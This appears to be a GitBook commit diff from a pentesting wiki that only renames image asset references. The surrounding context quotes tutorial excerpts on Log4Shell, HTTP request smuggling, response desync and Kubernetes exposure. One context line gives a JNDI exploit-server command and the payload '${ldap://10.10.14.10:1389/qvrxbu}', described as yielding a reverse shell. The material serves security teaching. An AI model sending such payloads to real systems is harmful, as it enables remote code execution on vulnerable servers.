GitBook: [#3047] No subject

README.md

@@ -30,7 +30,7 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 ### [STM Cyber](https://www.stmcyber.com)
 
-![](<.gitbook/assets/image (642) (1).png>)
+![](<.gitbook/assets/image (642) (1) (1).png>)
 
 [**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentestings, Red teams and training.
 

cloud-security/github-security/basic-github-information.md

@@ -63,7 +63,7 @@ You can also **create your own roles** in _https://github.com/organizations/\<or
 
 You can **list the teams created in an organization** in _https://github.com/orgs/\<org\_name>/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
 
-![](<../../.gitbook/assets/image (630).png>)
+![](<../../.gitbook/assets/image (630) (1).png>)
 
 ### Users
 

cloud-security/workspace-security.md

@@ -86,7 +86,7 @@ If someone creates a **copy** of that **document** that **contained the App Scri
 
 This method will be able to bypass also the Workspace admin restriction:
 
-![](<../.gitbook/assets/image (662).png>)
+![](<../.gitbook/assets/image (662) (1).png>)
 
 But can be prevented with:
 

pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md

@@ -37,7 +37,7 @@ URLs example to abuse JNDI:
 
 ### JNDI Example
 
-![](<../../.gitbook/assets/image (655).png>)
+![](<../../.gitbook/assets/image (655) (1).png>)
 
 Even if you have set a **`PROVIDER_URL`**, you can indicate a different one in a lookup and it will be accessed: `ctx.lookup("<attacker-controlled-url>")` and that is what an attacker will abuse to load arbitrary objects from a system controlled by him.
 
@@ -75,7 +75,7 @@ In case you can **make an app resolve a JNDI LDAP UR**L, you can control the LDA
 
 #### Deserialization exploit
 
-![](<../../.gitbook/assets/image (654) (1).png>)
+![](<../../.gitbook/assets/image (654) (1) (1).png>)
 
 The **exploit is serialized** and will be deserialized.\
 In case `trustURLCodebase` is `true`, an attacker can provide his own classes in the codebase if not, he will need to abuse gadgets in the classpath.
@@ -342,7 +342,7 @@ Use [**JNDI-Exploit-Kit**](https://github.com/pimps/JNDI-Exploit-Kit) to generat
 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -L 10.10.14.10:1389 -P /tmp/cc5.ser
 ```
 
-![](<../../.gitbook/assets/image (642).png>)
+![](<../../.gitbook/assets/image (642) (1).png>)
 
 Now you can easily use a generated JNDI link to exploit the vulnerability and obtain a **reverse shell** just sending to a vulnerable version of log4j: **`${ldap://10.10.14.10:1389/qvrxbu}`**
 

pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md

@@ -4,7 +4,7 @@
 
 The main origin of this vulnerability is the fact that the **reverse proxy** is going to **talk with the client** using **HTTP/2** but then it will **transform** that **communication** with the **back-end server** to **HTTP/1.1**.
 
-![](<../../.gitbook/assets/image (636).png>)
+![](<../../.gitbook/assets/image (636) (1).png>)
 
 The problem with this approach is that the **user** is going to be able to **inject** unnecessarily **headers** in the **HTTP/2 communication** that probably **won't be checked** by the proxy. But then, when those are **injected blindly in the HTTP/1.1 communication**, **a request smuggling attack can be performed**.
 
@@ -28,15 +28,15 @@ This technique was abused on AWS load balancer, so making sure that the users ac
 
 This is exactly the same technique as before, but checking the requests James noticed that clients were asking to send him their credentials, so he just modified his server to allow CORS to send him peoples credentials:
 
-![](<../../.gitbook/assets/image (662) (1).png>)
+![](<../../.gitbook/assets/image (662) (1) (1).png>)
 
 ### H2.TE via Request Header Injection
 
 **HTTP/2 also won't allow to put not permitted characters in headers**, but if the server **isn't respecting** this rule, you can **inject arbitrary headers** when the communication is **downgraded** to HTTP/1.1.
 
 In this case **the header Transfer-Encoding was injected**.
 
-![](<../../.gitbook/assets/image (648) (1).png>)
+![](<../../.gitbook/assets/image (648) (1) (1).png>)
 
 ### H2.TE via Header Name Injection
 
@@ -46,19 +46,19 @@ HTTP/2 on some servers lets you put a **colon in the header name, and with a \r\
 
 Note that if you put just the new line characters sending a header without content, the request is going to be treated as **invalid**:
 
-![](<../../.gitbook/assets/image (647).png>)
+![](<../../.gitbook/assets/image (647) (1).png>)
 
 ### H2.TE via Request LIne Injection
 
 In this case the injection was performed inside the request line:
 
-![](<../../.gitbook/assets/image (640).png>)
+![](<../../.gitbook/assets/image (640) (1).png>)
 
 ### URL Prefix Injection
 
 Inside the scheme of the HTTP/2 connection you might be able to send a full URL that will overwrite the one indicated in the path:
 
-![](<../../.gitbook/assets/image (661).png>)
+![](<../../.gitbook/assets/image (661) (1).png>)
 
 ### Request Line Injection via spaces
 
@@ -72,7 +72,7 @@ Note that **even** with that **restriction** you still can perform attacks like
 
 Usually this restriction doesn't exist so you can **smuggle request into the connection between the reverse proxy and the back end** that other people are using, but it's even **possible** that the **proxy** doesn't **even reuse a connection with connections from the same IP** (pretty heavy restriction for this kind of attack).
 
-![](<../../.gitbook/assets/image (646) (1).png>)
+![](<../../.gitbook/assets/image (646) (1) (1).png>)
 
 In the heaviest restriction (no connection reuse) you will detect the vulnerability with the Time Based technique, but then testing it you will find that it's a "false positive".
 
@@ -84,7 +84,7 @@ The **problem** with **HTTP/1.1** is that if you **receive 2 HTTP responses** yo
 
 However, this technique can be used **in HTTP/2** because if the endpoint was **vulnerable** and you smuggled one request, you will see the **headers of the response to the smuggled request in the response from the reverse proxy**:
 
-![](<../../.gitbook/assets/image (652).png>)
+![](<../../.gitbook/assets/image (652) (1).png>)
 
 ### Tunnel-vision Problem
 
@@ -98,7 +98,7 @@ However, the **HEAD** request **doesn't contain a body** but it usually **contai
 
 If you find a **POST** **parameter** inside the application whose **content** is going to be **reflected** in the **response**, then you can try to inject HTTP/1.1 \r\n characters inside a HTTP/2 request header so the newly injected headers by the proxy are going to be appended in the POST parameter that will be reflected in the response:
 
-![](<../../.gitbook/assets/image (656) (1).png>)
+![](<../../.gitbook/assets/image (656) (1) (1).png>)
 
 Note that in this case the **attacker** just cares about the **response** to the **first** **request**, he doesn't need to read the request to the smuggled invalid second request.
 
@@ -112,7 +112,7 @@ In this scenario a **HEAD** request to the **URL** **whose** **cache** is going
 
 Due to the fact the the **HEAD response contains the `Content-Type: text/html`** and because the reverse proxy thinks that the **whole response to the smuggled request is the body of the HEAD** request, the **XSS payload** is going to be **treated as HTML** even if the page wasn't vulnerable to XSS.
 
-![](<../../.gitbook/assets/image (659).png>)
+![](<../../.gitbook/assets/image (659) (1).png>)
 
 ## Hidden HTTP/2
 

pentesting-web/http-response-smuggling-desync.md

@@ -14,17 +14,17 @@ HTTP/1.1 allows to ask for **different resources without needing to wait for pre
 
 However, there is a problem desynchronising the responses queue. If an attacker send a HTTP Response smuggling attack and the responses to the **initial request and the smuggled one are responded immediately**, the smuggled response won't be inserted inside the queue of the victim response but will **just be discarded as an error**.
 
-![](<../.gitbook/assets/image (635) (1) (1).png>)
+![](<../.gitbook/assets/image (635) (1) (1) (1).png>)
 
 Therefore, it's needed that the **smuggled** **request** **takes more time to be processed** inside the back-end server. Therefore, by the time the smuggled request is processed, the communication with the attacker will be over.
 
 If in this specific situation a **victim has sent a request** and the **smuggled request is responded before** the legitimate request, the **smuggled response will be sent to the victim**. Therefore, the attacker will be **controlling the request "performed" by the victim**.
 
 Moreover, is the **attacker then perform a request** and the **legitimate response** to the **victim** request is **answered** **before** the attackers request. The **response to the victim is going to be sent to the attacker**, **stealing** the response to the victim (which can contains for example the header **Set-Cookie**).
 
-![](<../.gitbook/assets/image (658).png>)
+![](<../.gitbook/assets/image (658) (1).png>)
 
-![](<../.gitbook/assets/image (655) (1).png>)
+![](<../.gitbook/assets/image (655) (1) (1).png>)
 
 ### Multiple Nested Injections
 
@@ -52,7 +52,7 @@ First, the attacker send a payload containing a **final POST request with the re
 
 Then, once the **initial request** (blue) was **processed** and **while** the **sleepy** one is being processed (yellow) the **next request that arrives from a victim** is going to be **appended in the queue just after the reflected parameter**:
 
-![](<../.gitbook/assets/image (634).png>)
+![](<../.gitbook/assets/image (634) (1).png>)
 
 Then, the **victim** will **receive** the **response to the sleepy** request and if in the meantime the **attacker** **sent** **another** **request**, the **response from the reflected content request will be sent to him**.
 
@@ -80,15 +80,15 @@ Then, the **victim** will **receive** the **response** from the **HEAD** request
 
 Following the previous example, knowing that you can **control the body** of the request whose response is going to receive the victim and that a **HEAD** **response** usually contains in its headers the **Content-Type and the Content-Length**, you can **send a request like the following** one to **cause XSS** in the victim without the page being vulnerable to XSS:
 
-![](<../.gitbook/assets/image (654) (1) (1).png>)
+![](<../.gitbook/assets/image (654) (1) (1) (1).png>)
 
 ### Cache Poisoning
 
 Abusing the previously commented response desynchronisation Content Confusion attack, i**f the cache stores the response to the request performed by the victim and this response is an injected one causing a XSS, then the cache is poisoned**.
 
 Malicious request containing the XSS payload:
 
-![](<../.gitbook/assets/image (644).png>)
+![](<../.gitbook/assets/image (644) (1).png>)
 
 Malicious response to the victim that contains the header that indicates to the cache to store the response:
 
@@ -102,7 +102,7 @@ Note that in this case if the **"victim" is the attacker** he can now perform **
 
 This attack is similar to the previous one, but **instead of injecting a payload inside the cache, the attacker will be caching victim information inside of the cache:**
 
-![](<../.gitbook/assets/image (630) (1).png>)
+![](<../.gitbook/assets/image (630) (1) (1).png>)
 
 ### Response Splitting
 
@@ -112,11 +112,11 @@ In order to achieve this, the attacker needs to find an endpoint of the web appl
 
 He will send a **exploit** like:
 
-![](<../.gitbook/assets/image (649) (1).png>)
+![](<../.gitbook/assets/image (649) (1) (1).png>)
 
 After the first request is resolved and sent back to the attacker, the **victims request is added into the queue**:
 
-![](<../.gitbook/assets/image (661) (1).png>)
+![](<../.gitbook/assets/image (661) (1) (1).png>)
 
 The victim will receive as response the **HEAD response + the content of the second request response (containing part of the reflected data):**
 

pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md

@@ -66,7 +66,7 @@ http://bugbounty.dod.network = 127.0.0.2 (localhost)
 spoofed.burpcollaborator.net = 127.0.0.1
 ```
 
-![](<../../.gitbook/assets/image (649).png>)
+![](<../../.gitbook/assets/image (649) (1).png>)
 
 ### Domain Parser
 

pentesting/1883-pentesting-mqtt-mosquitto.md

@@ -15,7 +15,7 @@ PORT     STATE SERVICE                 REASON
 
 MQTT brokers send a **CONNACK** packet in **response** to a CONNECT packet. The **return code 0x00** indicates the credentials are valid and the return code **0x05 indicates they aren't. 0x05 example:**
 
-![](<../.gitbook/assets/image (645).png>)
+![](<../.gitbook/assets/image (645) (1).png>)
 
 ### ****[**Brute-Force MQTT**](../brute-force.md#mqtt)****
 

pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md

@@ -60,7 +60,7 @@ _This method requires you to run `kubectl` as an **authenticated user**._
 
 **NodePort opens a specific port on all the Nodes** (the VMs), and any **traffic** that is sent to this port is **forwarded to the service**. This is a really bad option usually.
 
-![](<../../.gitbook/assets/image (635) (1).png>)
+![](<../../.gitbook/assets/image (635) (1) (1).png>)
 
 An example of NodePort specification:
 
@@ -87,7 +87,7 @@ If you **don't specify** the **nodePort** in the yaml (it's the port that will b
 
 Exposes the Service externally **using a cloud provider's load balancer**. On GKE, this will spin up a [Network Load Balancer](https://cloud.google.com/compute/docs/load-balancing/network/) that will give you a single IP address that will forward all traffic to your service.
 
-![](<../../.gitbook/assets/image (654).png>)
+![](<../../.gitbook/assets/image (654) (1).png>)
 
 You have to pay for a LoadBalancer per exposed service, which can get expensive.
 
@@ -139,7 +139,7 @@ Unlike all the above examples, **Ingress is NOT a type of service**. Instead, it
 
 You can do a lot of different things with an Ingress, and there are **many types of Ingress controllers that have different capabilities**.
 
-![](<../../.gitbook/assets/image (653).png>)
+![](<../../.gitbook/assets/image (653) (1).png>)
 
 The default GKE ingress controller will spin up a [HTTP(S) Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) for you. This will let you do both path based and subdomain based routing to backend services. For example, you can send everything on foo.yourdomain.com to the foo service, and everything under the yourdomain.com/bar/ path to the bar service.
 

pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md

@@ -150,7 +150,7 @@ etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
 
 The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous acce**ss to the service is **allowed:**
 
-![](<../../.gitbook/assets/image (637).png>)
+![](<../../.gitbook/assets/image (637) (1).png>)
 
 The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**:
 

pentesting/pentesting-network/README.md

@@ -299,7 +299,7 @@ yersinia -I #Interactive mode
 yersinia -G #For graphic mode
 ```
 
-![](<../../.gitbook/assets/image (646).png>)
+![](<../../.gitbook/assets/image (646) (1).png>)
 
 To access the VLAN packets
 
@@ -344,7 +344,7 @@ If an attacker knows the value of the **MAC, IP and VLAN ID of the victim host**
 
 Another option for the attacker is to launch a **TCP port scan spoofing an IP controlled by the attacker and accessible by the victim** (probably through internet). Then, the attacker could sniff in the second host owned by him if it receives some packets from the victim.
 
-![](<../../.gitbook/assets/image (635).png>)
+![](<../../.gitbook/assets/image (635) (1).png>)
 
 To perform this attack you could use scapy: `pip install scapy`
 

radio-hacking/pentesting-ble-bluetooth-low-energy.md

@@ -8,7 +8,7 @@ BLE devices communicate is by sending **advertising packets** (**beacons**), the
 
 The listening device, also called a central device, can respond to an advertising packet with a **SCAN request** sent specifically to the advertising device. The **response** to that scan uses the same structure as the **advertising** packet with additional information that couldn’t fit on the initial advertising request, such as the full device name.
 
-![](<../.gitbook/assets/image (201) (2).png>)
+![](<../.gitbook/assets/image (201) (2) (1).png>)
 
 The preamble byte synchronizes the frequency, whereas the four-byte access address is a **connection identifier**, which is used in scenarios where multiple devices are trying to establish connections on the same channels. Next, the Protocol Data Unit (**PDU**) contains the **advertising data**. There are several types of PDU; the most commonly used are ADV\_NONCONN\_IND and ADV\_IND. Devices use the **ADV\_NONCONN\_IND** PDU type if they **don’t accept connections**, transmitting data only in the advertising packet. Devices use **ADV\_IND** if they **allow connections** and **stop sending advertising** packets once a **connection** has been **established**.
 

todo/hardware-hacking/README.md

@@ -8,7 +8,7 @@ Generally, the line is held high (at a logical 1 value) while UART is in the idl
 
 We call the most common configuration 8N1: eight data bits, no parity, and one stop bit. For example, if we wanted to send the character C, or 0x43 in ASCII, in an 8N1 UART configuration, we would send the following bits: 0 (the start bit); 0, 1, 0, 0, 0, 0, 1, 1 (the value of 0x43 in binary), and 0 (the stop bit).
 
-![](<../../.gitbook/assets/image (648).png>)
+![](<../../.gitbook/assets/image (648) (1).png>)
 
 Hardware tools to communicate with UART:
 

todo/hardware-hacking/i2c.md

@@ -12,7 +12,7 @@ To connect with the bus pirate you can follow the docs:
 
 In this case I'm going to connect to an EPROM: ATMEL901 24C256 PU27:
 
-![](<../../.gitbook/assets/image (465).png>)
+![](<../../.gitbook/assets/image (465) (2).png>)
 
 To talk with bus pirate I used Tera Term connected to the pirate bus COM port with a Setup --> Serial Port --> Speed of 115200.\
 In the following communication you can find how to prepare the bus pirate to talk I2C and how to write and read from the memory (Comments appear using "#", don't expect that part in the communication):
@@ -120,7 +120,7 @@ NACK
 
 In this scenario we are going to sniff the I2C communication between the arduino and the previous EPROM, you just need to communicate both devices and then connect the bus pirate to the SCL, SDA and GND pins:
 
-![](<../../.gitbook/assets/image (201).png>)
+![](<../../.gitbook/assets/image (201) (2).png>)
 
 ```bash
 I2C>m